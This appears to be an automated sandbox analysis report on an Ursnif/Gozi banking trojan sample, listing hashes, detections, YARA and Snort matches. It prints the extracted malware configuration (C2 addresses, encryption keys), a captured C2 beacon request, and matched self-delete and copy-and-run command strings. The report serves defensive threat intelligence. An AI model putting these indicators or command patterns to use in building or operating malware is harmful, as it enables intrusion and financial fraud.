Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
server_(3).exe

Overview

General Information

Sample Name:server_(3).exe
Analysis ID:830450
MD5:aa37b36ea7ba39b6c00ae1b01bada3f7
SHA1:90545746e5b23fcdf7db1fa5c30588df2f4c31bf
SHA256:a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7
Tags:agenziaentrateexegoziisfbITAmefmiseursnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Detected unpacking (changes PE section rights)
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Writes registry values via WMI
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • server_(3).exe (PID: 1236 cmdline: C:\Users\user\Desktop\server_(3).exe MD5: AA37B36EA7BA39B6C00AE1B01BADA3F7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Gozi, Ursnif2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gozi

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "ScCjtIu/chsReaToemavuPsGfYIczuvCBclhySG8/AhfUJMnvau4hmaBPIAXScUh9/secJMcCpqd5yeayd2fJdEc3ETZJfeY55SskXGIyxmn6sJL8WH2YF95GitV+tnd52epRBd8/snxdFtGg4Pgf9kxQsW/ySpD96hQxlGzGgDApS0E54E54SLEBTqihX3FWN2//mDaDIJuoFz7lt0whvCg/8gXPBf/s2nkXoRwyyqXguvwDcw9IZEu1NT1qqIwpXL9DGldaMvwfXTGOLIkQX35RsJJDpP1V5Mcgc+c1nBRPKqGQz+NUtKDBiyp0RXMK3jDdMGWvimLl80kvMkvSd8fQXtWRcZ7DCuQwrQxkXo=", "c2_domain": ["checklist.skype.com", "62.173.142.81", "193.233.175.113", "109.248.11.184", "212.109.218.26", "185.68.93.7"], "botnet": "7715", "server": "50", "serpent_key": "xeaLJj1BwSDpjIfH", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1cc0:$a9: Software\AppDataLow\Software\Microsoft\
    00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0x1228:$a1: /C ping localhost -n %u && del "%s"
      • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xa9c:$a5: filename="%.4u.%lu"
      • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe6d:$a9: &whoami=%s
      • 0xe56:$a10: %u.%u_%u_%u_x%u
      • 0xd63:$a11: size=%u&hash=0x%08x
      • 0xb1d:$a12: &uptime=%u
      • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
      • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
      Click to see the 27 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:192.168.2.462.173.142.8149695802033204 03/20/23-11:48:17.902010
      SID:2033204
      Source Port:49695
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.462.173.142.8149695802033203 03/20/23-11:48:17.902010
      SID:2033203
      Source Port:49695
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: server_(3).exeReversingLabs: Detection: 38%
      Source: server_(3).exeVirustotal: Detection: 37%Perma Link
      Machine Learning detection for sample
      Source: server_(3).exeJoe Sandbox ML: detected
      Source: 0.2.server_(3).exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: 00000000.00000002.580746978.0000000002729000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "ScCjtIu/chsReaToemavuPsGfYIczuvCBclhySG8/AhfUJMnvau4hmaBPIAXScUh9/secJMcCpqd5yeayd2fJdEc3ETZJfeY55SskXGIyxmn6sJL8WH2YF95GitV+tnd52epRBd8/snxdFtGg4Pgf9kxQsW/ySpD96hQxlGzGgDApS0E54E54SLEBTqihX3FWN2//mDaDIJuoFz7lt0whvCg/8gXPBf/s2nkXoRwyyqXguvwDcw9IZEu1NT1qqIwpXL9DGldaMvwfXTGOLIkQX35RsJJDpP1V5Mcgc+c1nBRPKqGQz+NUtKDBiyp0RXMK3jDdMGWvimLl80kvMkvSd8fQXtWRcZ7DCuQwrQxkXo=", "c2_domain": ["checklist.skype.com", "62.173.142.81", "193.233.175.113", "109.248.11.184", "212.109.218.26", "185.68.93.7"], "botnet": "7715", "server": "50", "serpent_key": "xeaLJj1BwSDpjIfH", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_005E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_005E1508

      Compliance

      barindex
      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Desktop\server_(3).exeUnpacked PE file: 0.2.server_(3).exe.400000.0.unpack
      Source: server_(3).exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\server_(3).exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Networking

      barindex
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49695 -> 62.173.142.81:80
      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49695 -> 62.173.142.81:80
      Source: Joe Sandbox ViewASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU
      Source: global trafficHTTP traffic detected: GET /drew/l9wdesHCBL/WcUH_2Fe6cEC19JMx/ojSec9BNMFM6/V8tDDFde77O/U9i1cqxDkO368R/9gNBIEzgy6mBOfdpOkxLi/yTSQzU5LkHeJ3ST8/wg2AtPFgVdoBaEt/6J4T7kNNoupXFHQTJc/6wx_2FfTi/ip9uaIqtLaRaENmKe5lk/gWcrKu3HuxIt5fBBNoX/csBNoK1ie3PBW5Bt5sLiYK/wkK58GrNqzGj0/jf15aQpx/17gepP_2BoXbW_2FEP_2BQC/qQ5KGV_2Fv/ErJyFWv8XjZRosjau/Q6z6usxdqA4/_2FeDY.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.81Connection: Keep-AliveCache-Control: no-cache
      Source: unknownDNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.81
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.81
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.81
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.81
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.81
      Source: server_(3).exe, 00000000.00000002.580737497.000000000238C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://62.173
      Source: unknownDNS traffic detected: queries for: checklist.skype.com
      Source: global trafficHTTP traffic detected: GET /drew/l9wdesHCBL/WcUH_2Fe6cEC19JMx/ojSec9BNMFM6/V8tDDFde77O/U9i1cqxDkO368R/9gNBIEzgy6mBOfdpOkxLi/yTSQzU5LkHeJ3ST8/wg2AtPFgVdoBaEt/6J4T7kNNoupXFHQTJc/6wx_2FfTi/ip9uaIqtLaRaENmKe5lk/gWcrKu3HuxIt5fBBNoX/csBNoK1ie3PBW5Bt5sLiYK/wkK58GrNqzGj0/jf15aQpx/17gepP_2BoXbW_2FEP_2BQC/qQ5KGV_2Fv/ErJyFWv8XjZRosjau/Q6z6usxdqA4/_2FeDY.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.81Connection: Keep-AliveCache-Control: no-cache

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTR

      E-Banking Fraud

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTR
      Source: C:\Users\user\Desktop\server_(3).exeCode function: 0_2_005E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_005E1508

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.580571515.00000000004D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Writes or reads registry keys via WMI
      Source: C:\Users\user\Desktop\server_(3).exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\server_(3).exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server_(3).exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server_(3).exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Writes registry values via WMI
      Source: C:\Users\user\Desktop\server_(3).exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server_(3).exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server_(3).exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: server_(3).exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
